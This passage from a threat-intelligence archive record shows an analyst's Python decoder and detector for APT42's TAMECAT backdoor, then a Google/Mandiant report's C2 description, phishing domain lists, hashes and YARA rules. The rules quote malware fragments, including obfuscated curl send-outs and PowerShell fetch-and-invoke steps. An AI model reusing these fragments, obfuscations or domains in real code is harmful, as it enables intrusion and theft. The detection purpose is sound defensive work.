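def make_content_dpr_iv():
    # The backdoor draws a 16-character IV from IV_ALPHABET and ships it in
    # the Content-DPR request header; the key is never transmitted.
    return ''.join(secrets.choice(IV_ALPHABET) for _ in range(IV_LENGTH))


def looks_like_tamecat_dpr(header_value):
    # Content-DPR is a legitimate but obsolete client-hints response header
    # whose value is a decimal pixel ratio such as 2.0. Sixteen letters in
    # that header, on a POST request or its response, fit the IV, not a DPR.
    return len(header_value) == IV_LENGTH and all(c in IV_ALPHABET for c in header_value)


def parse_tasking(plaintext):
    # A decrypted C2 response is four fields separated by the paragraph sign.
    fields = plaintext.split('¶')
    if len(fields) != 4:
        raise ValueError('expected 4 fields, got %d' % len(fields))
    language, command, thread_name, start_stop = fields
    if language not in LANGUAGES:
        raise ValueError('unknown Language: ' + language)
    if start_stop not in START_STOP:
        raise ValueError('unknown StartStop: ' + start_stop)
    return {'Language': language, 'Command': command,
            'ThreadName': thread_name, 'StartStop': start_stop}


# The prefixed Base64 string quoted in the post.
PREFIXED_URL = 'pepaHR0cHM6Ly9zMy50ZWJpLmlvL2ljZXN0b3JhZ2UvZGYzMnMudHh0'
# Constructed stand-in for the df32s.txt body; the real script is not reproduced.
SAMPLE_DF32S = encode_inverted(b'function Decrypt-Stage { param($data) }')
# Constructed tasking string in the four-field layout.
SAMPLE_TASKING = 'powershell¶Get-Process | Out-String¶worker1¶start'

if __name__ == '__main__':
    print(defang(decode_prefixed_url(PREFIXED_URL)))
    print(decode_inverted(SAMPLE_DF32S).decode('ascii'))
    iv = make_content_dpr_iv()
    print(iv, looks_like_tamecat_dpr(iv), looks_like_tamecat_dpr('2.0'))
    print(parse_tasking(SAMPLE_TASKING))
```

The Content-DPR check is a detection idea added here, not a rule from the post; on its own it is a weak signal, so pair it with the request shape (a POST carrying a Base64 body to a glitch[.]me host) before alerting.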
\r\nIf the response is successful, it is also expected to contain a header named Content-DPR, which is expected to\r\nhouse an IV used with the aforementioned AES key to decrypt the response data.\r\nThe decrypted response data is split by the paragraph symbol (¶) into four values:\r\nLanguage\r\nCommand\r\nThreadName\r\nStartStop\r\nThe available commands appear mostly the same as previously identified TAMECAT samples:\r\nVariable | Value | Description\r\n$language | powershell or csharp | Interpret the command value as PowerShell or C# code\r\n$StartStop | downloadutils, start or stop | Download additional content, start the command with parameters, or stop the command\r\nTable 2: Available commands\r\nOutlook and Implications\r\nAPT42 has remained relatively focused on intelligence collection and targeting similar victimology, despite the\r\nIsrael-Hamas war that has led other Iran-nexus actors to adapt by conducting disruptive, destructive, and hack-and-leak activities. \r\nIn addition to deploying custom implants on compromised devices, APT42 was also observed conducting\r\nextensive cloud operations. In cloud environments where implants cannot be deployed, APT42 relies on social engineering\r\nto harvest credentials and collect intelligence of strategic interest to Iran. Credential abuse was also emphasized as\r\na common initial access vector to cloud environments in the latest Google Cloud Threat Horizons report.\r\nThe methods deployed by APT42 leave a minimal footprint and might make the detection and mitigation of their\r\nactivities more challenging for network defenders. 
The TTPs, IOCs, and provided rules included in this blog post\r\nmay support detection and mitigation efforts.\r\nFor Google Chronicle Enterprise+ customers, Chronicle rules have been released to your Emerging Threats rule\r\npack, and IOCs listed in this blog post are available for prioritization with Applied Threat Intelligence. In addition,\r\nthe IOCs listed in this blog post are blocked in Safe Browsing, protecting Google Chrome users, as well as other\r\nbrowsers.\r\nIndicators of Compromise (IOCs)\r\nA VirusTotal Collection featuring IOCs related to the APT42 activity described in this post is now available for\r\nregistered users.\r\nCredential Harvesting and Cloud-Based Operations\r\nDomain Organization  Country \r\nCluster A\r\nNews Outlets\r\nazadlliq[.]info  Azadliq  Azerbaijan \r\nbusinesslnsider[.]org  Business Insider  U.S. \r\necomonist[.]org The Economist UK\r\neocnomist[.]com The Economist UK\r\nforeiqnaffairs[.]com  Foreign Affairs  U.S. \r\nforieqnaffairs[.]com Foreign Affairs  U.S. \r\nforeiqnaffairs[.]org Foreign Affairs  U.S. \r\nisraelhayum[.]com Israel Hayom Israel\r\njpost[.]press  Jerusalem Post  Israel \r\njpostpress[.]com  Jerusalem Post  Israel \r\nkhaleejtimes[.]org  Khaleej Times UAE \r\nkhalejtimes[.]org  Khaleej Times UAE \r\nmaariv[.]net  Maariv  Israel \r\nthemedealine[.]org  The Media Line  U.S. \r\ntimesfisrael[.]com Times Of Israel Israel\r\nvanityfaire[.]org Vanity Fair U.S.\r\nwashinqtonpost[.]press  The Washington Post  U.S. 
\r\nynetnews[.]press  Ynet  Israel \r\nLegitimate Services\r\naccount-signin[.]com Google/Microsoft N/A\r\nacconut-signin[.]com Google/Microsoft N/A\r\naccounts-mails[.]com Google/Microsoft N/A\r\ncoordinate[.]icu Generic N/A\r\nhttps://cloud.google.com/blog/topics/threat-intelligence/untangling-iran-apt42-operations\r\nPage 23 of 37\n\ndloffice[.]top Microsoft N/A\r\ndloffice[.]buzz Microsoft N/A\r\nmyaccount-signin[.]com Google/Microsoft N/A\r\nsignin-acconut[.]com Google/Microsoft N/A\r\nsignin-accounts[.]com Google/Microsoft N/A\r\nsignin-mail[.]com Google/Microsoft N/A\r\nsignin-mails[.]com Google/Microsoft N/A\r\nsignin-myaccounts[.]com Google/Microsoft N/A\r\nsupport-account[.]xyz Google/Microsoft N/A\r\nCluster B\r\nGeneric Login Services\r\naccredit-validity[.]online Generic N/A\r\nactivity-permission[.]online Generic N/A\r\nadmin-stable-right[.]top Generic N/A\r\nadmiscion[.]online Generic N/A\r\nhttps://cloud.google.com/blog/topics/threat-intelligence/untangling-iran-apt42-operations\r\nPage 24 of 37\n\nadmit-roar-frame[.]top Generic N/A\r\nadvission[.]online Generic N/A\r\naffect-fist-ton[.]online Generic N/A\r\navid-striking-eagerness[.]online Generic N/A\r\nbeaviews[.]online Generic N/A\r\nbesvision[.]top Generic N/A\r\nbloom-flatter-affably[.]top Generic N/A\r\nbook-download[.]shop Generic N/A\r\nbq-ledmagic[.]online Generic N/A\r\nbriview[.]online Generic N/A\r\nchat-services[.]online Generic N/A\r\ncheck-online-panel[.]live Generic N/A\r\ncheck-pabnel-status[.]live Generic N/A\r\ncheck-panel-status[.]live Generic N/A\r\ncheck-panel-status[.]live Generic N/A\r\nhttps://cloud.google.com/blog/topics/threat-intelligence/untangling-iran-apt42-operations\r\nPage 25 of 37\n\ncheck-short-panel[.]live Generic N/A\r\nconfirmation-process[.]top Generic N/A\r\nconnection-view[.]online Generic N/A\r\ncontinue-meeting[.]site Generic N/A\r\ncontinue-recognized[.]online Generic N/A\r\ncvisiion[.]online Generic N/A\r\ndrive-access[.]site Generic 
N/A\r\nendorsement-services[.]online Generic N/A\r\nfortune-retire-home[.]top Generic N/A\r\ngeaviews[.]site Generic N/A\r\nglory-uplift-vouch[.]online Generic N/A\r\ngo-conversation[.]lol Generic N/A\r\ngo-forward[.]quest Generic N/A\r\ngview[.]site Generic N/A\r\nhome-continue[.]online Generic N/A\r\nhttps://cloud.google.com/blog/topics/threat-intelligence/untangling-iran-apt42-operations\r\nPage 26 of 37\n\nhome-proceed[.]online Generic N/A\r\nidentifier-direction[.]site Generic N/A\r\nindication-service[.]online Generic N/A\r\njoin-paneling[.]online Generic N/A\r\nksview[.]top Generic N/A\r\nlast-check-leave[.]buzz Generic N/A\r\nlive-project-online[.]live Generic N/A\r\nlive-projects-online[.]top Generic N/A\r\nloriginal[.]online Generic N/A\r\nmail-roundcube[.]site Generic N/A\r\nmeeting-online[.]site Generic N/A\r\nmterview[.]site Generic N/A\r\nnterview[.]site Generic N/A\r\nonline-processing[.]online Generic N/A\r\nonline-video-services[.]site Generic N/A\r\nhttps://cloud.google.com/blog/topics/threat-intelligence/untangling-iran-apt42-operations\r\nPage 27 of 37\n\novcloud[.]online Generic N/A\r\npanel-check-short[.]live Generic N/A\r\npanel-check-short[.]live Generic N/A\r\npanel-live-check[.]online Generic N/A\r\npanel-short-check[.]live Generic N/A\r\npanel-view-short[.]online Generic N/A\r\npanel-view[.]live Generic N/A\r\npanel-view[.]online Generic N/A\r\npanel-views-cheking[.]live Generic N/A\r\npanelchecking[.]live Generic N/A\r\npaneling-viewing[.]live Generic N/A\r\npanels-views-ckeck[.]live Generic N/A\r\npannel-get-data[.]us Generic N/A\r\nquomodocunquize[.]site Generic N/A\r\nrecognize-validation[.]online Generic N/A\r\nhttps://cloud.google.com/blog/topics/threat-intelligence/untangling-iran-apt42-operations\r\nPage 28 of 37\n\nreconsider[.]site Generic N/A\r\nrevive-project-live[.]online Generic N/A\r\nshort-url[.]live Generic N/A\r\nshort-view[.]online Generic N/A\r\nshortenurl[.]online Generic N/A\r\nshortingurling[.]live Generic 
N/A\r\nshortlinkview[.]live Generic N/A\r\nshortulonline[.]live Generic N/A\r\nshorting-ce[.]live Generic N/A\r\nshoting-urls[.]live Generic N/A\r\nsimple-process-static[.]top Generic N/A\r\nstatus-short[.]live Generic N/A\r\nstellar-roar-right[.]buzz Generic N/A\r\nsweet-pinnacle-readily[.]online Generic N/A\r\ntcvision[.]online Generic N/A\r\nhttps://cloud.google.com/blog/topics/threat-intelligence/untangling-iran-apt42-operations\r\nPage 29 of 37\n\ntitle-flow-store[.]online Generic N/A\r\ntwision[.]top Generic N/A\r\nushrt[.]us Generic N/A\r\nverify-person-entry[.]top Generic N/A\r\nview-cope-flow[.]online Generic N/A\r\nview-panel[.]live Generic N/A\r\nview-pool-cope[.]online Generic N/A\r\nview-total-step[.]online Generic N/A\r\nviewstand[.]online Generic N/A\r\nviewtop[.]online Generic N/A\r\nvirtue-regular-ready[.]online Generic N/A\r\nwe-transfer[.]shop Generic N/A\r\nURL Shortening Services\r\nm85[.]online Generic N/A\r\ns51[.]online Generic N/A\r\nhttps://cloud.google.com/blog/topics/threat-intelligence/untangling-iran-apt42-operations\r\nPage 30 of 37\n\ns59[.]site Generic N/A\r\ns20[.]site Generic N/A\r\nd75[.]site Generic N/A\r\nCluster C\r\nURL Shortening Services\r\nbitly[.]org[.]il Bitly Israel\r\nlitby[.]us Bitly U.S.\r\nMailer Daemon\r\ndaemon-mailer[.]co Mailer Daemon N/A\r\ndaemon-mailer[.]info Mailer Daemon N/A\r\nemail-daemon[.]biz Mailer Daemon N/A\r\nemail-daemon[.]biz[.]tinurls[.]com Mailer Daemon N/A\r\nemail-daemon[.]online[.]tinurls[.]com Mailer Daemon N/A\r\nemail-daemon[.]online Mailer Daemon N/A\r\nemail-daemon[.]site Mailer Daemon N/A\r\nhttps://cloud.google.com/blog/topics/threat-intelligence/untangling-iran-apt42-operations\r\nPage 31 of 37\n\nmailer-daemon[.]info Mailer Daemon N/A\r\nmailerdaemon[.]online Mailer Daemon N/A\r\nmailer-daemon[.]us Mailer Daemon N/A\r\nThink Tanks \u0026 Research Institutes\r\naspenlnstitute[.]org Aspen Institute U.S.\r\nmccainlnstitute[.]org Mccain Institute U.S.\r\nwashingtonlnstitute[.]org The 
Washington Institute U.S.\r\nFile Sharing Services\r\nyoutransfer[.]live YouTransfer N/A\r\nMiscellaneous \r\ng-online[.]org Generic N/A\r\nonline-access[.]live Generic N/A\r\nyouronlineregister[.]com Generic N/A\r\nMalware Operations\r\nNICECURL\r\nhttps://cloud.google.com/blog/topics/threat-intelligence/untangling-iran-apt42-operations\r\nPage 32 of 37\n\nRelated IOCs\r\nd5a05212f5931d50bb024567a2873642\r\n347b273df245f5e1fcbef32f5b836f1d\r\n2f6bf8586ed0a87ef3d156124de32757\r\n13aa118181ac6a202f0a64c0c7a61ce7\r\nc23663ebdfbc340457201dbec7469386\r\n853687659483d215309941dae391a68f\r\ndrive-file-share[.]site\r\nprism-west-candy[.]glitch[.]me\r\nNICECURL: YARA Rules\r\nrule M_APT_Backdoor_NICECURL_1 {\r\nmeta:\r\nauthor = \"Mandiant\"\r\nmd5 = \"c23663ebdfbc340457201dbec7469386\"\r\ndate_created = \"2024-01-18\"\r\n date_modified = \"2024-01-18\"\r\n rev = \"1\"\r\nstrings:\r\n$ = \"a = \\\"llehS.tpircsW\\\"\" ascii wide\r\n$ = \"b = StrReverse(a)\" ascii wide\r\n$ = \"Set objShell = wscript.CreateObject(b)\"\r\n$ = \"WHFilePath = Temp \u0026 \\\"/\\\" \u0026 ProgName\" ascii wide\r\n$ = \"Do While not FileExists(WHFilePath)\" ascii wide\r\n$ = \"cmd /C start /MIN curl --ssl-no-revoke -s -d \\\"\\\"\\\"\" ascii wide\r\n$ = \"nicecmdPath = Temp \u0026 \\\"/\\\" \u0026 ProgName\" ascii wide\r\nhttps://cloud.google.com/blog/topics/threat-intelligence/untangling-iran-apt42-operations\r\nPage 33 of 37\n\n$ = \"Function RunCom(Com, Url, nicecmdPath)\" ascii wide\r\n$ = \"ComDecode = Base64Decode(Com)\" ascii wide\r\n$ = \"InStr(ComDecode, \\\"kill\\\")\" ascii wide\r\n$ = \"InStr(ComDecode, \\\"SetNewConfig\\\")\" ascii wide\r\n$ = \"InStr(ComDecode, \\\"Module\\\")\" ascii wide\r\n$ = \"Sub DeleteFile(filespec)\" ascii wide\r\n$ = \"Sub CopyFile(Src, Dst)\" ascii wide\r\n$ = \"Function SendData(sUrl, sRequest, nicecmdPath)\" ascii wide\r\n$ = \"Function WriteToFile(FilePath, data)\" ascii wide\r\n$ = \"Function GetSystemCaption()\" ascii wide\r\n$ = \"Function 
GetPlainSess()\" ascii wide\r\ncondition:\r\n4 of them\r\n}\r\nrule M_APT_Backdoor_NICECURL_datamine_module_1 {\r\nmeta:\r\nauthor = \"Mandiant\"\r\nmd5 = \"853687659483d215309941dae391a68f\"\r\ndate_created = \"2024-01-18\"\r\n date_modified = \"2024-01-18\"\r\n rev = \"1\"\r\nstrings:\r\n$ = \"a = \\\"llehS.tpircsW\\\"\" ascii wide\r\n$ = \"b = StrReverse(a)\" ascii wide\r\n$ = \"Set objShell = wscript.CreateObject(b)\" ascii wide\r\n$ = \"ModuleName \u0026 \\\" module started successfully.\\\"\" ascii wide\r\n$ = \"SendLog(MAC, Logs, ModuleName, \\\"Success\\\")\" ascii wide\r\n$ = \"\u0026 vbNewLine \u0026 \\\"*** Ant:\\\"\" ascii wide\r\n$ = \"For Each antivirus in installedAntiviruses\" ascii wide\r\n$ = \"list=list \u0026 VBNewLine \u0026 antivirus.displayName\" ascii wide\r\n$ = \"checking the state of the 12th bit of productState property of\r\nthe antivirus\" ascii wide\r\n$ = \"For Each item In query_result\" ascii wide\r\n$ = \"Set query_result = objWMI.ExecQuery(\\\"\" ascii wide\r\n$ = \"Function SendFile(FilePath, ModuleName)\" ascii wide\r\n$ = \"Function SendData(Base64Data, FolderName, FileName, Format)\"\r\nascii wide\r\n$ = \"call HTTPPost(Url, sRequest)\" ascii wide\r\n$ = \"ChunckData = Mid(Base64Data, 1, lengthdata)\" ascii wide\r\n$ = \"ChunckData = Mid(Base64Data, (i * lengthdata) + 1)\" ascii wide\r\n$ = \"ChunckData = Mid(Base64Data, (i * lengthdata) + 1, lengthdata)\"\r\nascii wide\r\n$ = \"Function SendLog(MAC, Logs, ModuleName, Status)\" ascii wide\r\ncondition:\r\nhttps://cloud.google.com/blog/topics/threat-intelligence/untangling-iran-apt42-operations\r\nPage 34 of 37\n\n4 of them\r\n}\r\nTAMECAT\r\nRelated IOCs\r\nd7bf138d1aa2b70d6204a2f3c3bc72a7\r\n081419a484bbf99f278ce636d445b9d8\r\nc3b9191f3a3c139ae886c0840709865e\r\ndd2653a2543fa44eaeeff3ca82fe3513\r\n9c5337e0b1aef2657948fd5e82bdb4c3\r\ntnt200[.]mywire[.]org\r\naccurate-sprout-porpoise[.]glitch[.]me\r\nTAMECAT: YARA Rules\r\nrule M_APT_Backdoor_TAMECAT_2 {\r\nmeta:\r\nauthor = 
\"Mandiant\"\r\nmd5 = \"9c5337e0b1aef2657948fd5e82bdb4c3\"\r\ndate_created = \"2024-03-05\"\r\n date_modified = \"2024-03-05\"\r\n rev = \"1\"\r\nstrings:\r\n$ = \"$a.CreateDecryptor($a.Key,$a.iv)\"\r\n$ = \"$CommandParts = \\\"\\\"\"\r\n$ = \"$macP = $env:APPDATA+\\\"\\\\\"\r\n$ = \"$macP = \\\"$env:LOCALAPPDATA\\\\\"\r\n$ = \"$mac += Get-Content -Path $macP\"\r\nhttps://cloud.google.com/blog/topics/threat-intelligence/untangling-iran-apt42-operations\r\nPage 35 of 37\n\n$ = \"$CommandParts =$SessionResponse.Split(\\\"\"\r\n$ = \"[string]$CommandPart = \\\"\\\";\"\r\n$ = \"Foreach ($CommandPart in $CommandParts)\"\r\n$ = \"$CommandPart.Split(\\\"~\\\");\"\r\n$ = \"elseif($StartStop -eq \\\"stop\\\")\"\r\n$ = \"if($StartStop -eq \\\"start\\\")\"\r\n$ = \"\u0026(gcm *ke-e*) $Command;\"\r\ncondition:\r\n3 of them and filesize\u003c2MB\r\n}\r\nrule M_APT_Downloader_TAMECAT_NICECURL_VBScript_1 {\r\n meta:\r\n author = \"Mandiant\"\r\n md5 = \"d7bf138d1aa2b70d6204a2f3c3bc72a7\"\r\n date_created = \"2024-03-13\"\r\n date_modified = \"2024-03-13\"\r\n rev = \"1\"\r\n strings:\r\n $ = \"For Each antivirus in installedAntiviruses\"\r\n $ = \"list=list \u0026 VBNewLine \u0026 antivirus.displayName\"\r\n $ = \"\\\"conhost conhost powershell.exe -w 1 -c \\\"\"\r\n $ = \"-UseBasicParsing).Content; \u0026(gcm *e-e?p*)$\"\r\n $ = \"Set oE = objShell.Exec(\"\r\n $ = \"\\\"cmd.exe /c set c=cu9rl --s9sl-no-rev9oke -s -d \\\"\"\r\n $ = \"\u0026 call %c:9=% \u0026 set b=sta9rt\"\r\n condition:\r\n 3 of them\r\n}\r\nrule M_APT_Backdoor_TAMECAT {\r\n meta:\r\n author = \"Mandiant\"\r\n md5 = \"d7bf138d1aa2b70d6204a2f3c3bc72a7\"\r\n date_created = \"2024-03-11\"\r\n date_modified = \"2024-03-11\"\r\n rev = \"1\"\r\n strings:\r\n $s1 = \"OutputCom = OutputCom \u0026 \\\"NOT_FOUND\\\"\" ascii wide\r\n $s2 = \"OutputCom = OutputCom \u0026 list\" ascii wide\r\n $s3 = \"If antivirus.productState And \u0026h01000 Then\" ascii wide\r\n condition:\r\n all of 
them\r\n}\r\nhttps://cloud.google.com/blog/topics/threat-intelligence/untangling-iran-apt42-operations\r\nPage 36 of 37\n\nPosted in\r\nThreat Intelligence\r\nSource: https://cloud.google.com/blog/topics/threat-intelligence/untangling-iran-apt42-operations\r\nhttps://cloud.google.com/blog/topics/threat-intelligence/untangling-iran-apt42-operations\r\nPage 37 of 37",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"ETDA",
		"MITRE",
		"Malpedia"
	],
	"references": [
		"https://cloud.google.com/blog/topics/threat-intelligence/untangling-iran-apt42-operations"
	],
	"report_names": [
		"untangling-iran-apt42-operations"
	],
	"threat_actors": [
		{
			"id": "82b92285-4588-48c9-8578-bb39f903cf62",
			"created_at": "2022-10-25T15:50:23.850506Z",
			"updated_at": "2026-04-10T02:00:05.418577Z",
			"deleted_at": null,
			"main_name": "Charming Kitten",
			"aliases": [
				"Charming Kitten"
			],
			"source_name": "MITRE:Charming Kitten",
			"tools": [
				"DownPaper"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "d8af157e-741b-4933-bb4a-b78490951d97",
			"created_at": "2023-01-06T13:46:38.748929Z",
			"updated_at": "2026-04-10T02:00:03.087356Z",
			"deleted_at": null,
			"main_name": "APT35",
			"aliases": [
				"COBALT MIRAGE",
				"Agent Serpens",
				"Newscaster Team",
				"Magic Hound",
				"G0059",
				"Phosphorus",
				"Mint Sandstorm",
				"TunnelVision"
			],
			"source_name": "MISPGALAXY:APT35",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "82f54603-89e0-4f5a-8df9-eae0c3a90d70",
			"created_at": "2022-10-25T16:07:23.745406Z",
			"updated_at": "2026-04-10T02:00:04.734764Z",
			"deleted_at": null,
			"main_name": "ITG18",
			"aliases": [],
			"source_name": "ETDA:ITG18",
			"tools": [],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "d0e8337e-16a7-48f2-90cf-8fd09a7198d1",
			"created_at": "2023-03-04T02:01:54.091301Z",
			"updated_at": "2026-04-10T02:00:03.356317Z",
			"deleted_at": null,
			"main_name": "APT42",
			"aliases": [
				"UNC788",
				"CALANQUE"
			],
			"source_name": "MISPGALAXY:APT42",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "ae26d287-8ba7-447e-9391-cf13c02d7481",
			"created_at": "2023-03-04T02:01:54.0962Z",
			"updated_at": "2026-04-10T02:00:03.357189Z",
			"deleted_at": null,
			"main_name": "TA453",
			"aliases": [],
			"source_name": "MISPGALAXY:TA453",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "029625d2-9734-44f9-9e10-b894b4f57f08",
			"created_at": "2023-01-06T13:46:38.364105Z",
			"updated_at": "2026-04-10T02:00:02.944092Z",
			"deleted_at": null,
			"main_name": "Charming Kitten",
			"aliases": [
				"iKittens",
				"Group 83",
				"NewsBeef",
				"G0058",
				"CharmingCypress",
				"Mint Sandstorm",
				"Parastoo"
			],
			"source_name": "MISPGALAXY:Charming Kitten",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "e3676dfe-3d40-4b3a-bfbd-4fc1f8c896f4",
			"created_at": "2022-10-25T15:50:23.808974Z",
			"updated_at": "2026-04-10T02:00:05.291959Z",
			"deleted_at": null,
			"main_name": "Magic Hound",
			"aliases": [
				"Magic Hound",
				"TA453",
				"COBALT ILLUSION",
				"Charming Kitten",
				"ITG18",
				"Phosphorus",
				"APT35",
				"Mint Sandstorm"
			],
			"source_name": "MITRE:Magic Hound",
			"tools": [
				"Impacket",
				"CharmPower",
				"FRP",
				"Mimikatz",
				"Systeminfo",
				"ipconfig",
				"netsh",
				"PowerLess",
				"Pupy",
				"DownPaper",
				"PsExec"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "99c7aace-96b1-445b-87e7-d8bdd01d5e03",
			"created_at": "2025-08-07T02:03:24.746965Z",
			"updated_at": "2026-04-10T02:00:03.640335Z",
			"deleted_at": null,
			"main_name": "COBALT ILLUSION",
			"aliases": [
				"APT35 ",
				"APT42 ",
				"Agent Serpens Palo Alto",
				"Charming Kitten ",
				"CharmingCypress ",
				"Educated Manticore Checkpoint",
				"ITG18 ",
				"Magic Hound ",
				"Mint Sandstorm sub-group ",
				"NewsBeef ",
				"Newscaster ",
				"PHOSPHORUS sub-group ",
				"TA453 ",
				"UNC788 ",
				"Yellow Garuda "
			],
			"source_name": "Secureworks:COBALT ILLUSION",
			"tools": [
				"Browser Exploitation Framework (BeEF)",
				"MagicHound Toolset",
				"PupyRAT"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "2bfa2cf4-e4ce-4599-ab28-d644208703d7",
			"created_at": "2025-08-07T02:03:24.764883Z",
			"updated_at": "2026-04-10T02:00:03.611225Z",
			"deleted_at": null,
			"main_name": "COBALT MIRAGE",
			"aliases": [
				"DEV-0270 ",
				"Nemesis Kitten ",
				"PHOSPHORUS ",
				"TunnelVision ",
				"UNC2448 "
			],
			"source_name": "Secureworks:COBALT MIRAGE",
			"tools": [
				"BitLocker",
				"Custom powershell scripts",
				"DiskCryptor",
				"Drokbk",
				"FRPC",
				"Fast Reverse Proxy (FRP)",
				"Impacket wmiexec",
				"Ngrok",
				"Plink",
				"PowerLessCLR",
				"TunnelFish"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "0b212c43-009a-4205-a1f7-545c5e4cfdf8",
			"created_at": "2025-04-23T02:00:55.275208Z",
			"updated_at": "2026-04-10T02:00:05.270553Z",
			"deleted_at": null,
			"main_name": "APT42",
			"aliases": [
				"APT42"
			],
			"source_name": "MITRE:APT42",
			"tools": [
				"NICECURL",
				"TAMECAT"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "1699fb41-b83f-42ff-a6ec-984ae4a1031f",
			"created_at": "2022-10-25T16:07:23.83826Z",
			"updated_at": "2026-04-10T02:00:04.761303Z",
			"deleted_at": null,
			"main_name": "Magic Hound",
			"aliases": [
				"APT 35",
				"Agent Serpens",
				"Ballistic Bobcat",
				"Charming Kitten",
				"CharmingCypress",
				"Cobalt Illusion",
				"Cobalt Mirage",
				"Educated Manticore",
				"G0058",
				"G0059",
				"Magic Hound",
				"Mint Sandstorm",
				"Operation BadBlood",
				"Operation Sponsoring Access",
				"Operation SpoofedScholars",
				"Operation Thamar Reservoir",
				"Phosphorus",
				"TA453",
				"TEMP.Beanie",
				"Tarh Andishan",
				"Timberworm",
				"TunnelVision",
				"UNC788",
				"Yellow Garuda"
			],
			"source_name": "ETDA:Magic Hound",
			"tools": [
				"7-Zip",
				"AnvilEcho",
				"BASICSTAR",
				"CORRUPT KITTEN",
				"CWoolger",
				"CharmPower",
				"ChromeHistoryView",
				"CommandCam",
				"DistTrack",
				"DownPaper",
				"FRP",
				"Fast Reverse Proxy",
				"FireMalv",
				"Ghambar",
				"GoProxy",
				"GorjolEcho",
				"HYPERSCRAPE",
				"Havij",
				"MPK",
				"MPKBot",
				"Matryoshka",
				"Matryoshka RAT",
				"MediaPl",
				"Mimikatz",
				"MischiefTut",
				"NETWoolger",
				"NOKNOK",
				"PINEFLOWER",
				"POWERSTAR",
				"PowerLess Backdoor",
				"PsList",
				"Pupy",
				"PupyRAT",
				"SNAILPROXY",
				"Shamoon",
				"TDTESS",
				"WinRAR",
				"WoolenLogger",
				"Woolger",
				"pupy",
				"sqlmap"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775434587,
	"ts_updated_at": 1775792040,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/e2b253b023aae7abc86c8ea77b5d6bc2b8b82d35.pdf",
		"text": "https://archive.orkl.eu/e2b253b023aae7abc86c8ea77b5d6bc2b8b82d35.txt",
		"img": "https://archive.orkl.eu/e2b253b023aae7abc86c8ea77b5d6bc2b8b82d35.jpg"
	}
}